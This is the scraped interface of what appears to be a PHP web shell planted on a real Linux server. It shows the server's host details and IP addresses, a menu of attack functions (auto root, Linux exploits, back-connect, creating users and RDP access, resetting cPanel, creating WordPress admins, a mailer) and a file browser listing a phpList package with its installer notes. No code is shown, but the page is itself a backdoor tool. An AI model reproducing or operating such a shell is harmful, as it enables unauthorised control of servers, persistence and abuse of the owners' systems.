Linux server1.sbs.cy 5.14.0-362.18.1.el9_3.x86_64 #1 SMP PREEMPT_DYNAMIC Mon Jan 29 07:05:48 EST 2024 x86_64
Apache
: 199.192.25.12 | : 172.71.254.181
28 Domain
8.1.31
administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
var /
softaculous /
phplist /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
_index.php
34.3
KB
-rw-r--r--
clone.php
5.07
KB
-rw-r--r--
config.php
41.33
KB
-rw-r--r--
edit.php
4.38
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
fileindex.php
108
B
-rw-r--r--
import.php
3.28
KB
-rw-r--r--
index.php
34.3
KB
-rw-r--r--
info.xml
2.62
KB
-rw-r--r--
install.js
921
B
-rw-r--r--
install.php
4.74
KB
-rw-r--r--
install.xml
1.26
KB
-rw-r--r--
md5
1.09
KB
-rw-r--r--
notes.txt
1.08
KB
-rw-r--r--
upgrade.php
3.35
KB
-rw-r--r--
upgrade.xml
341
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : notes.txt
1) Remove php_flag from .htaccess in the package 2) define ("TEST",1); to define ("TEST",0); in config.php use config_extended.php 3) After DB dump from manual Installation Go to System -> Upgrade phplist and then again take a dump. Check the difference and add ('version', '...', 0, NULL), 4) We have configured the _index.php with our changes and we replace it at /admin/index.php for auto upgrade and the we revert the changes after the upgrade. Since version 3.3.3 we change $GLOBALS['require_login'] = 1; to $GLOBALS['require_login'] = 0;. Please make sure the _index.php and index.php are updated in the package from the latest zip package /admin/index.php 5) Please edit your config file and change "mysql.inc" to "mysqli.inc" to avoid future PHP incompatibility 6) PHP REQUIREMENT LINK : https://resources.phplist.com/system/start ( Does not work on PHP 5.3 so we have kept min req 5.4. Check in next version ) 7) When we check auto upgrade with debug=died on cpanel it is redirecting to blank page. This is happening because the script has written some javascript code with is hiding all response.
Close